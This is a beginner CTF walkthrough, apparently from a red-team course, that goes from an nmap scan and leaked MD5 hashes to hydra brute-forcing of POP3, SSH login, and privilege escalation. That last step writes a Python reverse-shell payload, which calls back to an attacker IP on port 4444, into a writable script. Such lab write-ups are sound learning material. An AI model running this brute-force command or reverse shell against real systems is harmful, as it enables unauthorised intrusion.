A beginner-friendly CTF challenge
This walkthrough is written as a part of Master certificate in cybersecurity (Red Team) that I am pursuing from HackeU.
Starting with a nmap scan
Port 80 is open so there must be a webpage and we also some other services on port 110 and 143 which might be interesting.
Checking the webpage
On the webpage, we can see a Twitter account username
This Twitter account had a Pastebin link for leaked password and usernames
We get a list of passwords that are MD5 encrypted
Saved all the hashes in the file and decrypted it online
As pop3 is available we can use these credentials to brute force the login
hydra pop3://<IP> -L users.txt -P passw.txt
And we found the password
Connecting to the pop3 service using netcat
Here we have 2 messages, now the important information for the flags is hidden in them.
Found the password for SSH login
Found the username as well for the SSH login
Using these credentials to log in via SSH
and we are finally in!!
Finding the files with user execution permissions
find / -group users -type f 2>/dev/null
Our main focus is
Editing the cube.sh file and writing our reverse shell payload into it.
python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“<IP>”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
Executing the cube.sh file and we get a reverse shell
and we found our root flag
Thanks for reading.